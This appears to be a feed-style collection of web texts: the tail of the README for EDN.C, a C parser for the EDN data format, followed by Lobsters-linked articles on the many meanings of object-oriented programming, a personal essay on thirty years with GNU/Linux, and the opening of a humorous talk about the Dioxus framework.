
{:foo """
        line1
       line2
      line3"""}

Result: {:foo " line1\n line2\nline3"} (min indent 6, no trailing newline)

Build Configuration:

This feature is disabled by default. To enable it:

Make:

CMake:

cmake -DEDN_ENABLE_TEXT_BLOCKS=ON ..
make

When disabled (default):

  • """\n pattern is parsed as a regular string
  • No automatic indentation processing

Note: Text blocks are an experimental feature and not part of the official EDN specification.

See examples/example_text_block.c for more examples.

Examples

Interactive TUI Viewer

EDN.C includes an interactive terminal viewer for exploring EDN data:

# Build the TUI
make tui

# Explore data interactively
./examples/edn_tui data.edn

# Use arrow keys to navigate, Enter/Space to expand/collapse, q to quit

CLI Tool

EDN.C includes a command-line tool for parsing and pretty-printing EDN files:

# Build the CLI
make cli

# Parse and pretty-print a file
./examples/edn_cli data.edn

# Or from stdin
echo '{:name "Alice" :age 30}' | ./examples/edn_cli

Complete Working Example

#include "edn.h"
#include <stdio.h>
#include <string.h>

void print_value(edn_value_t *val, int indent) {
    for (int i = 0; i < indent; i++) printf("  ");
    
    switch (edn_type(val)) {
        case EDN_TYPE_NIL:
            printf("nil\n");
            break;
        case EDN_TYPE_BOOL:
            // Note: Use internal API or add edn_bool_get() to public API
            printf("bool\n");
            break;
        case EDN_TYPE_INT: {
            int64_t num;
            edn_int64_get(val, &num);
            printf("%lld\n", (long long)num);
            break;
        }
        case EDN_TYPE_FLOAT: {
            double num;
            edn_double_get(val, &num);
            printf("%g\n", num);
            break;
        }
        case EDN_TYPE_STRING: {
            size_t len;
            const char *str = edn_string_get(val, &len);
            printf("\"%.*s\"\n", (int)len, str);
            break;
        }
        case EDN_TYPE_KEYWORD: {
            const char *name;
            size_t len;
            edn_keyword_get(val, NULL, NULL, &name, &len);
            printf(":%.*s\n", (int)len, name);
            break;
        }
        case EDN_TYPE_VECTOR: {
            printf("[\n");
            size_t count = edn_vector_count(val);
            for (size_t i = 0; i < count; i++) {
                print_value(edn_vector_get(val, i), indent + 1);
            }
            for (int i = 0; i < indent; i++) printf("  ");
            printf("]\n");
            break;
        }
        case EDN_TYPE_MAP: {
            printf("{\n");
            size_t count = edn_map_count(val);
            for (size_t i = 0; i < count; i++) {
                print_value(edn_map_get_key(val, i), indent + 1);
                print_value(edn_map_get_value(val, i), indent + 1);
            }
            for (int i = 0; i < indent; i++) printf("  ");
            printf("}\n");
            break;
        }
        default:
            printf("<other type>\n");
    }
}

int main(void) {
    const char *edn = 
        "{:users [{:name \"Alice\" :age 30}\n"
        "         {:name \"Bob\" :age 25}]\n"
        " :status :active}";
    
    edn_result_t result = edn_read(edn, 0);
    
    if (result.error != EDN_OK) {
        fprintf(stderr, "Error at %zu:%zu - %s\n",
                result.error_line, result.error_column, result.error_message);
        return 1;
    }
    
    printf("Parsed EDN structure:\n");
    print_value(result.value, 0);
    
    edn_free(result.value);
    return 0;
}

More examples available in the examples/ directory.

Building

Standard Build (Unix/macOS/Linux)

# Build library (libedn.a)
make

# Build and run all tests
make test

# Build and run single test
make test/test_numbers
./test/test_numbers

# Build with debug symbols and sanitizers (ASAN/UBSAN)
make DEBUG=1

# Run benchmarks
make bench          # Quick benchmark
make bench-all      # All benchmarks

# Clean build artifacts
make clean

# Show build configuration
make info

Windows Build

EDN.C fully supports Windows with MSVC, MinGW, and Clang. Choose your preferred method:

Quick Start (CMake - Recommended):

# Using the provided build script
.\build.bat

# Or with PowerShell
.\build.ps1 -Test

Manual CMake Build:

mkdir build
cd build
cmake .. -DCMAKE_BUILD_TYPE=Release
cmake --build . --config Release
ctest -C Release

Visual Studio:

  • Open CMakeLists.txt in Visual Studio 2019+
  • Build → Build All (Ctrl+Shift+B)

For detailed Windows build instructions, see docs/WINDOWS.md .

Build Options

Standard options:

  • DEBUG=1 - Enable debug symbols, ASAN, and UBSAN
  • SANITIZE=1 - Enable sanitizers without full debug build
  • OPTIMIZE=0 - Disable optimizations
  • VERBOSE=1 - Show full compiler commands

Optional EDN features (disabled by default):

  • MAP_NAMESPACE_SYNTAX=1 - Enable #:ns{...} map namespace syntax
  • EXTENDED_CHARACTERS=1 - Enable \formfeed , \backspace , \oNNN octal escapes
  • METADATA=1 - Enable Clojure-style metadata ^{...} syntax
  • TEXT_BLOCKS=1 - Enable Java-style text blocks """\n...\n"""
  • RATIO=1 - Enable ratio numbers 22/7
  • EXTENDED_INTEGERS=1 - Enable hex ( 0xFF ), octal ( 0777 ), binary ( 2r1010 ), and radix ( 36rZZ ) formats
  • UNDERSCORE_IN_NUMERIC=1 - Enable underscores in numeric literals 1_000_000

Example:

# Build with metadata and ratio support
make METADATA=1 RATIO=1

Code Formatting

# Auto-format all C files (run before committing!)
make format

# Check if formatting is needed without modifying
make format-check

LSP Support

# Generate compile_commands.json for LSP (requires bear or compiledb)
make compile-commands

Performance

EDN.C is designed for high performance with several optimizations:

  • SIMD acceleration : Vectorized whitespace scanning, comment skipping, and identifier parsing
  • Zero-copy strings : String values without escapes point directly into input buffer
  • Lazy decoding : Escape sequences decoded only when accessed via edn_string_get()
  • Arena allocation : Single bulk allocation and deallocation eliminates malloc overhead
  • Efficient collections : Maps and sets use sorted arrays with binary search

Typical performance on Apple M1 (from microbenchmarks):

  • Whitespace skipping: 1-5 ns per operation
  • Number parsing: 10-30 ns per number
  • String parsing: 15-50 ns per string
  • Identifier parsing: 10-25 ns per symbol/keyword

See bench/ directory for detailed benchmarking tools and results.

Project Status

Current version : 1.0.0 (Release Candidate)

Complete features:

  • Full EDN specification support
  • All scalar types (nil, bool, int, bigint, float, character, string, symbol, keyword)
  • All collection types (lists, vectors, maps, sets)
  • Tagged literals with custom reader support
  • Discard forms #_
  • Comments ( ; line comments)
  • Duplicate detection for maps/sets
  • Deep structural equality
  • SIMD optimization for ARM64 (NEON) and x86_64 (SSE4.2)
  • Cross-platform support (Unix, macOS, Linux, Windows)
  • Optional Clojure extensions (disabled by default):
    • Map namespace syntax #:ns{...}
    • Extended character literals ( \formfeed , \backspace , \oNNN )
    • Metadata ^{...} syntax

Testing:

  • 340+ tests across 24 test suites
  • Memory safety verified with ASAN/UBSAN
  • Edge case coverage (empty collections, deeply nested structures, Unicode, etc.)

📋 Roadmap:

  • Performance profiling and further optimization
  • Extended documentation and tutorials
  • Streaming/Incremental parsing
  • Additional SIMD Platform Support:
    • 32-bit x86 (i386/i686) __i386__, _M_IX86. mostly the same as x86-64
    • 32-bit ARM (ARMv7) __arm__, _M_ARM. mostly the same as ARM64 NEON
    • RISC-V Vector Extension (RVV) __riscv, __riscv_vector. uses <riscv_vector.h>
  • Extra features:
    • float trailing dot ("1." => 1.0, "1.M" => 1.0M)
    • octal escape (""\176"" => "~")

Contributing

Contributions are welcome! Please:

  1. Run make format before committing (auto-formats with clang-format)
  2. Ensure all tests pass with make test
  3. Add tests for new features
  4. Follow the existing code style (K&R, 4 spaces, C11, see .clang-format )

Documentation

License

MIT License

Copyright (c) 2025 [Kirill Chernyshov]

Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions:

The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software.

THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.

Acknowledgments

  • EDN specification: https://github.com/edn-format/edn
  • Inspired by Clojure's EDN implementation
  • Benchmark files from fast-edn
  • SWAR (SIMD Within A Register) digit parsing technique from simdjson
  • Fast double parsing using Clinger's algorithm (William D. Clinger, 1990) - "How to Read Floating Point Numbers Accurately"
  • SIMD optimization patterns from high-performance JSON parsers (simdjson, yyjson)

Questions or issues? Please open an issue on GitHub or consult the documentation in the docs/ directory.

Fifty Shades of OOP

Lobsters
lesleylai.info
2025-11-24 09:38:48
Comments...
Original Article

OOP-bashing seems fashionable nowadays. I decided to write this article after seeing two OOP-related articles on Lobsters in quick succession. I’m not interested in defending or attacking OOP, but I do want to throw in my two cents and offer a more nuanced view.

The industry and the academy have used the term “object-oriented” to mean so many different things. One thing that makes conversations around OOP so unproductive is the lack of consensus on what OOP is.

What is Object-Oriented Programming? Wikipedia defines it as “a programming paradigm based on the concept of objects.” This definition is unsatisfactory, as it requires a definition of an “object” and fails to encompass the disparate ways the term is used in the industry. There is also Alan Kay’s vision of OOP . However, the way most people use the term has drifted apart, and I don’t want to fall into essentialism or etymological fallacy by insisting on a “true” meaning.

Instead, I think it is better to treat OOP as a mixed bag of interrelated ideas and examine them individually. Below, I will survey some ideas related to OOP and mention their pros and cons (in my subjective mind).

Classes

Object-oriented programming is a method of implementation in which programs are organized as cooperative collections of objects, each of which represents an instance of some class, and whose classes are all members of a hierarchy of classes united via inheritance relationships. — Grady Booch

Classes extend the idea of a “struct” or “record” with support for the method syntax, information hiding, and inheritance. We will talk about those specific features later.

Classes can also be viewed as blueprints for objects. It is not the only way to do that, and prototypes is an alternative pioneered by Self and, most famously, used by JavaScript. Personally, I feel that prototypes are harder to wrap one’s head around compared to classes. Even JavaScript tries to hide its usage of prototypes from newcomers with ES6 classes.

Method Syntax

In Japanese, we have sentence chaining, which is similar to method chaining in Ruby — Yukihiro Matsumoto

The method syntax is one of the less controversial OOP features. It captures common programming use cases involving operations on a specific subject. Even in languages without methods, it is common to see functions effectively serve as methods by taking the relevant data as their first argument (or last, in languages with currying).

The syntax involves method definitions and method calls. Usually, languages supporting methods have both, unless you consider the “pipe operators” in functional languages as a form of method call.

The method call syntax aids IDE autocompletion, and method chaining is often more ergonomic than nested function calls (similar to the pipe operator in functional languages).

There are some debatable aspects of the method syntax, too. First, in many languages, methods are often not definable outside of a class, which causes a power imbalance compared to functions. There are certain exceptions, such as Rust (methods are always defined outside of the struct), Scala, Kotlin, and C# (extension methods).

Second, in many languages, this or self is implicit. This keeps the code more concise, but it can also introduce confusion and increase the risk of accidental name shadowing. Another drawback of an implicit this is that it is always passed as a pointer, and its type cannot be changed. This means you cannot pass it as a copy, and sometimes this indirection leads to performance issues. More importantly, because the type of this is fixed, you cannot write generic functions that accept different this types. Python and Rust got this right from the start, and C++ just fixed this issue in C++23 with deducing this .

Third, in languages with both “free functions” and methods, they become two incompatible ways to do the same thing. This can cause problems in generic code. Rust addresses this issue by allowing fully qualifying a method name and treating it as a function .

Fourth, the dot notation is used for both instance variable accesses and method calls in most languages. This is an intentional choice to make methods look more uniform with objects. In certain dynamically typed languages where methods are instance variables , this is fine and pretty much not even a choice. On the other hand, in languages like C++ or Java, this can cause confusion and shadowing problems.

Information Hiding

Its interface or definition was chosen to reveal as little as possible about its inner workings — [Parnas, 1972b]

In Smalltalk, all instance variables are not directly accessible from outside the object, and all methods are exposed. More modern OOP languages support information hiding via access specifiers like private at the class level. Even non-OOP languages usually support information hiding in some way, be it module systems, opaque types, or even C’s header separation.

Information hiding is a good way to prevent invariant from being violated. It is also a good way to separate frequently changed implementation details from a stable interface.

Nevertheless, aggressively hiding information may cause unnecessary boilerplate or abstraction inversion . Another criticism comes from functional programmers, who argue that you don’t need to maintain invariants and thus don’t need much information hiding if data is immutable . And, in a sense, OOP encourages people to write mutable objects that must be maintained as invariants.

Information hiding also encourages people to create small, self-contained objects that “know how to handle themselves,” which leads directly into the topic of encapsulation.

Encapsulation

If you can, just move all of that behavior into the class it helps. After all, OOP is about letting objects take care of themselves. — Bob Nystrom, Game Programming Patterns

Encapsulation is often confused with information hiding, but the two are distinct. Encapsulation refers to bundling data with the functions that operate on it. OOP languages directly support encapsulation with classes and the method syntax, but there are other approaches (e.g., the module system in OCaml ).

Data-oriented design has a lot to say about bundling data and functionality. When many objects exist, it is often much more efficient to process them in batches rather than individually. Having small objects with distinct behaviors can lead to poor data locality, more indirection, and fewer opportunities for parallelism. Of course, advocates of data-oriented design don’t reject encapsulation outright, but they encourage a more coarse-grained form of it, organized around how the code is actually used rather than how the domain model is conceptually structured .

Interfaces

“No part of a complex system should depend on the internal details of any other part.” — Daniel, Ingalls. “ The Smalltalk-76 Programming System Design and Implementation

Separation of interface and implementation is an old idea closely related to information hiding, encapsulation, and abstract data type . In some sense, even C’s header files can be considered an interface, but OOP usage of “interface” most often refers to a specific set of language constructs that support polymorphism (typically implemented via inheritance). Usually, an interface can’t contain data, and in more restricted languages (e.g., early versions of Java), they can’t contain method implementations either. The same idea of an interface is also common in non-OOP languages: Haskell type classes, Rust traits, and Go interfaces all serve the role of specifying an abstract set of operations independent of implementations.

Interface is often considered a simpler, more disciplined alternative to full-blown class inheritance. It is a single-purpose feature and doesn’t suffer from the same diamond problem that plagues multiple inheritance.

Interface is also extremely useful in combination with parametric polymorphism , since it allows you to constrain the operations a type parameter must support. Dynamically-typed languages (and C++/D template) achieve something similar through duck-typing , but even languages with duck-typing introduce interface constructs later to express constraints more explicitly (e.g., C++ concepts or TypeScript interfaces).

The interface as implemented in OOP languages often has a runtime cost, but that’s not always the case. For example, C++ concepts is an example that only supports compile-time, and Rust’s trait only has opt-in runtime polymorphism support via dyn .

Late Binding

OOP to me means only messaging, local retention and protection and hiding of state-process, and extreme late-binding of all things — Alan Kay

Late binding refers to delaying the lookup of a method or a member until runtime. It is the default of most dynamic-typed languages, where method calls are often implemented as a hash table lookup, but can also be achieved with other means, such as dynamic loading or function pointers.

A key aspect of late binding is that behaviour can be changed while the software is still running, enabling all kinds of hot-reloading and monkey-patching workflows.

The downside of late binding is its non-trivial performance cost. Moreover, it can also be a footgun for breaking invariants or even interface mismatches. Its mutable nature can also introduce subtler issues, for example, the “late binding closures” pitfall in Python.

Dynamic Dispatch

A programming paradigm in C++ using Polymorphism based on runtime function dispatch using virtual functions — Back to Basics: Object-Oriented Programming - Jon Kalb - CppCon 2019

A concept related to late binding is dynamic dispatch, in which the implementation of a polymorphic operation is selected at runtime. The two concepts overlap, though dynamic dispatch focuses more on selecting multiple known polymorphic operations rather than on name lookup.

In a dynamically typed language, dynamic dispatch is the default since everything is late-bound. In statically typed languages, it is usually implemented as a virtual function table that looks something like this under the hood:

struct VTable {

// function pointer to destroy the base

void (*destroy)(Base&);

// function pointer to one method implementation

void (*foo)();

// function pointer to another method implementation

int (*bar)(int);

};

struct BaseClass {

VTable* vtable;

};

These languages also provide compile-time guarantees that the vtable contains valid operations for the type.

Dynamic dispatch can be decoupled from inheritance, whether by manually implementing a v-table (e.g., C++‘s “type-erased types” such as std::function ) or an interface/trait/typeclass kind of constructs. When not paired with inheritance, dynamic dispatch alone is usually not considered “OOP.”

Another thing to note is that the pointer to the v-table can be directly inside the object (e.g., C++) or embedded in “fat pointers” (e.g., Go and Rust).

Complaints about dynamic dispatch are usually about its performance. Although a virtual function call itself can be pretty fast, it opens room for missing compiler inlining opportunities, cache misses, and branch mispredictions .

Inheritance

programming using class hierarchies and virtual functions to allow manipulation of objects of a variety of types through well-defined interfaces and to allow a program to be extended incrementally through derivation — Bjarne Stroustrup

Inheritance has a long history, way backed to Simula 67 . It is probably the most iconic feature of OOP. Almost every language marketed as “object-oriented” includes it, while languages that avoid OOP typically omit it.

It can be damn convenient . In many cases, using an alternative approach will result in significantly more boilerplate.

On the other hand, inheritance is a very non-orthogonal feature. It is a single mechanism that enables dynamic dispatch, subtyping polymorphism, interface/implementation segregation, and code reuse. It is flexible, though that flexibility makes it easy to misuse. For that reason, some languages nowadays replace it with more restrictive alternative constructs.

There are some other problems with inheritance. First, using inheritance almost certainly means you are paying the performance cost of dynamic dispatch and heap allocation. In some languages, such as C++, you can use inheritance without dynamic dispatch and heap allocation, and there are some valid use cases (e.g., code reuse with CRTP ), but the majority of uses of inheritance are for runtime polymorphism (and thus rely on dynamic dispatch).

Second, inheritance implements subtyping in an unsound way, requiring programmers to manually enforce the Liskov substitution principle .

Finally, inheritance hierarchies are rigid. They suffer from issues like the diagonal problem, and that inflexibility is one of the main reasons people prefer composition over inheritance. The component pattern chapter of Game Programming Patterns provides a good example.

Subtyping Polymorphism

If for each object of type there is another object of type such that for all programs defined in terms of , the behavior of is unchanged when is substituted for , then is a subtype of . — Barbara Liskov, “ Data Abstraction and Hierarchy

Subtyping describes an “is a” relation between two types. The Liskov substitution principle defines the property that safe subtyping relationships must uphold.

OOP languages often support subtyping via inheritance, but note that inheritance doesn’t always model subtyping, and it is not the only form of subtyping either. Various interface/trait constructs in non-OOP languages often support subtyping. And besides nominal subtyping , where one explicitly declares the subtyping relationship, there are also structural subtyping , where the subtyping is implicit if one type contains all the features of another type. Good examples of structural subtyping include OCaml ( objects and polymorphic variants) and TypeScript interfaces. Subtyping also shows in all kinds of little places, such as Rust lifetime and TypeScript’s coercion from a non-nullable type to its nullable counterpart.

A related concept to subtyping is variance (not related to class-invariant), which bridges parametric polymorphism and subtyping. I won’t bother explaining variance here, as this topic probably needs an entire blog post to explain well. It is a great ergonomic boost (e.g., C++ pointers will be unusable for polymorphic use if it is not covariant), but most languages only implement a limited, hard-coded version, because it is hard to understand and also error-prone. In particular, mutable data types usually should be invariant, and Java/C#‘s covariant arrays are a primary example on this got wrong. There are a few languages that support programmers explicitly control variance, including Scala and Kotlin .

Type conversion via subtyping relationships is often implicit. Implicit conversion has a bad reputation. Though doing it with subtyping is ergonomic, and is probably the least surprising kind of implicit conversion. Another way to view subtyping is as the dual of implicit conversions. We can “fake” a subtyping relation with implicit conversion. For example, C++ templated types are invariant, but std::unique_ptr achieves covariance with an implicit conversion from std::unique_ptr<Derived> to std::unique_ptr<Base> . Does Go Have Subtyping? is a good article to further explore this idea.

One reason that language designers often try to avoid subtyping is the implementation complexity. Integrating bidirectional type inference and subtyping is notoriously difficult. Stephen Dolan’s 2016 thesis Algebraic Subtyping makes good progress addressing this issue.

Message Passing

I thought of objects being like biological cells and/or individual computers on a network, only able to communicate with messages — Alan Kay

Message passing means using objects that send each other “messages” as a way of execution. It is the centric theme of Alan Kay’s vision of OOP, though the definition can be pretty vague. An important point is that message names are late-bound, and the structures of these messages are not necessarily fixed at compile time.

Many early object-oriented concepts were influenced by distributed and simulation systems, where message passing is natural. However, in the era where most people work on single-threaded code, the message was gradually forgotten in languages such as C++ and Java. The method syntax only has limited benefit compared to the original message-passing idea (Bjarne Stroustrup was definitely aware of the idea from Simula, but there is practical constraint on how to make it fast). There was still some genuine message passing, but only in specific areas such as inter-process communication or highly event-driven systems.

Message passing gains a Renaissance in concurrent programming, ironically through non-OOP languages like Erlang and Golang, with constructs such as actors and channels. This kind of shared-nothing concurrency removed a whole range of data race and race condition bugs. In combination with supervision, actors also provide fault tolerance, so that the failure of one actor will not affect the entire program.

Open-recursion

Originating in the famous Types and Programming Languages , open recursion is probably the least well-known and understood term in this blog post. Nevertheless, it just describes a familiar property of object-oriented systems: methods for an object can call each other, even if they are defined in different classes in the inheritance hierarchy.

The term is somewhat misleading, as there may not be recursive function calls, but here “recursion” means “mutually recursive.” The word “open” refers to “open to extension,” typically empowered by inheritance.

It’s easiest to see with an example:

struct Animal {

void print_name() const {

// Note that we call `name` here, although it is not defined in Animal

std::print("{}\n", name());

}

virtual std::string name() const = 0;

};

struct Cat: Animal {

std::string name() const override {

return "Kitty";

}

};

int main() {

Cat cat;

// note we call print_name here, although it is not defined in Cat

cat.print_name();

}

For anyone with some familiarity with OOP, we probably take open recursion for granted, even though we may not be aware of its name. But not all language constructs have this property. For example, in many languages, functions are not mutually recursive by default:

// This won't compile in C++ because `name` is not defined

void print_name(const Animal& animal) {

return name(animal);

}

std::string name(const Cat& cat) {

return "Kitty";

}

Now, in languages with late-bound functions, functions in the same module can always call each other (e.g., Python, JavaScript). There are other languages where functions are mutually recursive by default (e.g., Rust), or have forward declarations (C) or a letrec construct (Scheme and ML family) to make functions mutually recursive. This solves the “recursion” part, but still not the “open” part yet:

std::string name(const Cat& cat);

void print_name(const Animal& animal) {

// This still won't compile because we can't downcast an Animal to a Cat

return name(animal);

}

std::string name(const Cat& cat) {

return "Kitty";

}

Let’s fix this problem by using a callback:

struct Animal {

std::function<std::string()> get_name;

void print_name() const {

std::print("{}\n", get_name());

}

};

Animal make_cat() {

return Animal {

.get_name = []() { return "Kitty"; },

};

}

int main() {

Animal cat = make_cat();

cat.print_name();

}

Tada, we just reinvented prototype-style dispatch!

Anyway, with my quick example above, I want to show that open recursion is a property that OOP gives for free, but reproducing it in languages without built-in support can be tricky. Open recursion allows interdependent parts of an object to be defined separately, and this property is used in many instances, for example, the entire idea of decorator pattern depends on open recursion.

OOP Best Practices

Perhaps the more common complaints about OOP are not about specific language features, but rather about the programming styles it encourages. Many practices are taught as universal best practices, sometimes with rationales, but their downsides are often omitted. Some examples popped into my mind are

Practice Advantages Disadvantage
preferring polymorphism over tagged union/if/switch/pattern matching Open to extension, easier to add new cases. Performance hit; Related behaviors get scattered in multiple places; harder to see the whole controll flow in one place
making all data members private Protect class invariants More boilerplates; Often unnecessary to hide data without invariants; Getter/setter pairs work less well compared to direct access in languages without property syntax
preferring small “self-managed” objects over central “managers” Harder to violate invariants, cleaner code organization Potential bad data locality, missing parallelism opportunities, and duplicated references to common data (“back pointer”)
preferring extension rather than modification Prevent new features from breaking the old one. Prevent API break No reason to “close” a non-public module where you own its usage. Leads to unnecessary complexity and inheritance chain; poorly designed interfaces are not changed; Can cause abstraction inversion
preferring abstraction over concrete implementations Making more system swappable and testable Overuse sacrifices readability and debuggability. Performance cost of extra indirection

This blog post is long enough, so I will not go into more details. Feel free to disagree with my “advantages and disadvantages”. What I want to convey is that almost all those practices come with trade-offs.

In the End

Congratulations on making it to the end of this article! There are other topics I’d love to discuss, such as RAII and design patterns. However, this article is long enough, so I will leave those for you to explore on your own.

Why I (still) love Linux

Lobsters
it-notes.dragas.net
2025-11-24 09:27:56
Comments...
Original Article

I know, this title might come as a surprise to many. Or perhaps, for those who truly know me, it won’t. I am not a fanboy. The BSDs and the illumos distributions generally follow an approach to design and development that aligns more closely with the way I think, not to mention the wonderful communities around them, but that does not mean I do not use and appreciate other solutions. I usually publish articles about how much I love the BSDs or illumos distributions, but today I want to talk about Linux (or, better, GNU/Linux) and why, despite everything, it still holds a place in my heart. This will be the first in a series of articles where I’ll discuss other operating systems.

Where It All Began

I started right here , with GNU/Linux, back in 1996. It was my first real prompt after the Commodore 64 and DOS. It was my first step toward Unix systems, and it was love at first shell. I felt a sense of freedom - a freedom that the operating systems I had known up to that point (few, to be honest) had never given me. It was like a “blank sheet” (or rather, a black one) with a prompt on it. I understood immediately that this prompt, thanks to command chaining, pipes, and all the marvels of Unix and Unix-like systems, would allow me to do anything. And that sense of freedom is what makes me love Unix systems to this day.

I was young, but my intuition was correct. And even though I couldn't afford to keep a full Linux installation on that computer long-term due to hardware limitations, I realized that this would be my future. A year later, a new computer arrived, allowing me to use Linux daily, for everything. And successfully, without missing Windows at all (except for a small partition, strictly for gaming).

When I arrived at university, in 1998, I was one of the few who knew it. One of the few who appreciated it. One of the few who hoped to see a flourishing future for it. Everywhere. Widespread. A dream come true. I was a speaker at Linux Days, I actively participated in translation projects, and I wrote articles for Italian magazines. I was a purist regarding the "GNU/Linux" nomenclature because I felt it was wrong to ignore the GNU part - it was fundamental. Because perhaps the "Year of the Linux Desktop" never arrived , but Linux is now everywhere. On my desktop, without a doubt. But also on my smartphone (Android) and on those of hundreds of millions of people. Just as it is in my car. And in countless devices surrounding us - even if we don’t know it. And this is the true success. Let’s not focus too much on the complaint that "it’s not compatible with my device X". It is your device that is not compatible with Linux, not the other way around. Just like when, many years ago, people complained that their WinModems (modems that offloaded all processing to obscure, closed-source Windows drivers) didn't work on Linux. For "early adopters" like me, this concept has always been present, even though, fortunately, things have improved exponentially.

Linux was what companies accepted most willingly (not totally, but still...): the ongoing lawsuits against the BSDs hampered their spread, and Linux seemed like that "breath of fresh air" the world needed.

Linux and its distributions (especially those untethered from corporations, like Debian, Gentoo, Arch, etc.) allowed us to replicate expensive "commercial" setups at a fraction of the cost. Reliability was good, updating was simple, and there was a certain consistency. Not as marked as that of the BSDs, but sufficient.

The world was ready to accept it, albeit reluctantly. Linus Torvalds, despite his sometimes harsh and undiplomatic tone, carried forward the kernel development with continuity and coherence, making difficult decisions but always in line with the project. The "move fast and break things" model was almost necessary because there was still so much to build. I also remember the era when Linux - speaking of the kernel - was designed almost exclusively for x86. The other architectures, to simplify, worked thanks to a series of adaptations that brought most behavior back to what was expected for x86.

And the distributions, especially the more "arduous" ones to install, taught me a lot. The distro-hopping of the early 2000s made me truly understand partitioning, the boot procedure (Lilo first, then Grub, etc.), and for this, I must mainly thank Gentoo and Arch (and the FreeBSD handbook - but this is for another article). I learned the importance of backups the hard way, and I keep this lesson well in mind today. My Linux desktops ran mainly with Debian (initially), then Gentoo, Arch, and openSUSE (which, at the time, was still called "SUSE Linux"), Manjaro, etc. My old 486sx 25Mhz with 4MB (yes, MB) of RAM, powered by Debian, allowed me to download emails (mutt and fetchmail), news (inn + suck), program in C, and create shell scripts - at the end of the 90s.

When Linux Conquered the World

Then the first Ubuntu was launched, and many things changed. I don't know if it was thanks to Ubuntu or simply because the time was ripe, but attention shifted to Linux on the desktop as well (albeit mainly on the computers of us enthusiasts), and many companies began to contribute actively to the system or distributions.

I am not against the participation of large companies in Open Source. Their contributions can be valuable for the development of Open Source itself, and if companies make money from it, good for them. If this ultimately leads to a more complete and valid Open Source product, then I welcome it! It is precisely thanks to mass adoption that Linux cleared the path for the acceptance of Open Source at all levels. I still remember when, just after graduating, I was told that Linux (and Open Source systems like the BSDs) were "toys for universities". I dare anyone to say that today!

But this must be done correctly: without spoiling the original idea of the project and without hijacking (voluntarily or not) development toward a different model. Toward a different evolution. The use of Open Source must not become a vehicle for a business model that tends to close, trap, or cage the user. Or harm anyone. And if it is oriented toward worsening the product solely for one's own gain, I can only be against it.

What Changed Along the Way

And this is where, unfortunately, I believe things have changed in the Linux world (if not in the kernel itself, at least in many distributions). Innovation used to be disruptive out of necessity. Today, in many cases, disruption happens without purpose, and stability is often sacrificed for changes that do not solve real problems. Sometimes, in the name of improved security or stability, a new, immature, and unstable product is created - effectively worsening the status quo.

To give an example, I am not against systemd on principle, but I consider it a tool distant from the original Unix principles - do one thing and do it well - full of features and functions that, frankly, I often do not need. I don't want systemd managing my containerization. For restarting stopped services? There are monit and supervisor - efficient, effective, and optional. And, I might add: services shouldn't crash; they should handle problems in a non-destructive way. My Raspberry Pi A+ doesn't need systemd, which occupies a huge amount of RAM (and precious clock cycles) for features that will never be useful or necessary on that platform.

But "move fast and break things" has arrived everywhere, and software is often written by gluing together unstable libraries or those laden with system vulnerabilities. Not to mention so-called "vibe coding" - which might give acceptable results at certain levels, but should not be used when security and confidentiality become primary necessities or, at least, without an understanding of what has been written.

We are losing much of the Unix philosophy, and many Linux distributions are now taking the path of distancing themselves from a concept of cross-compatibility ("if it works on Linux, I don't care about other operating systems"), of minimalism, of "do one thing and do it well". And, in my opinion, we are therefore losing many of the hallmarks that have distinguished its behavior over the years.

In my view, this depends on two factors: a development model linked to a concept of "disposable" electronics, applied even to software, and the pressure from some companies to push development where they want, not where the project should go. Therefore, in certain cases, the GPL becomes a double-edged sword: on one hand, it protects the software and ensures that contributions remain available. On the other, it risks creating a situation where the most "influential" player can totally direct development because - unable to close their product - they have an interest in the entire project going in the direction they have predisposed. In these cases, perhaps, BSD licenses actually protect the software itself more effectively. Because companies can take and use without an obligation to contribute. If they do, it is because they want to, as in the virtuous case of Netflix with FreeBSD. And this, while it may remove (sometimes precious) contributions to the operating system, guarantees that the steering wheel remains firmly in the hands of those in charge - whether foundations, groups, or individuals.

And Why I Still Care

And so yes, despite all this, I (still) love Linux.

Because it was the first Open Source project I truly believed in (and which truly succeeded), because it works, and because the entire world has developed around it. Because it is a platform on which tons of distributions have been built (and some, like Alpine Linux, still maintain that sense of minimalism that I consider correct for an operating system). Because it has distributions like openSUSE (and many others) that work immediately and without problems on my laptop (suspension and hibernation included) and on my miniPC, a fantastic tool I use daily. Because hardware support has improved immensely, and it is now rare to find incompatible hardware.

Because it has been my life companion for 30 years and has contributed significantly to putting food on the table and letting me sleep soundly. Because it allowed me to study without spending insane amounts on licenses or manuals. Because it taught me, first, to think outside the box. To be free.

So thank you, GNU/Linux.

Even if your btrfs, after almost 18 years, still eats data in spectacular fashion. Even if you rename my network interfaces after a reboot. Even though, at times, I get the feeling that you’re slowly turning into what you once wanted to defeat.

Even if you are not my first choice for many workloads, I foresee spending a lot of time with you for at least the next 30 years.

Does Dioxus spark joy?

Lobsters
fasterthanli.me
2025-11-24 09:24:08
Comments...
Original Article
Amos

Note: this article is adapted from a presentation I gave at a Rust Paris Meetup — that’s why it sounds a little different than usual. Enjoy!

Good evening! Tonight, I will attempt to answer the question: Does Dioxus spark joy? Or at the very least, whimsy.

What’s Dioxus, you ask? It is first and foremost a name that is quote: “legally not inspired by any Pokémon”.

The deoxys pokemon

Even if the author concedes in a Hacker News comment that the “Deoxys” Pokémon is, I quote: “awesome”.

To cover any upcoming legal fees just in case Nintendo doesn’t buy that origin story, Dioxus is, as of the summer of 2023, a YCombinator startup.

The YC page for dioxuslabs, active since summer 2023, team size 4, founder Jonathan Kelley.

Regulars might be wondering at this point, what does any of that have to do with Rust? Well, don’t worry, I have gone and checked for you: Dioxus is , in fact, getting money from Huawei, which makes it a Rust project just like any other.

Screenshot of the YC page where it says Dioxus Labs gets Huawei money.

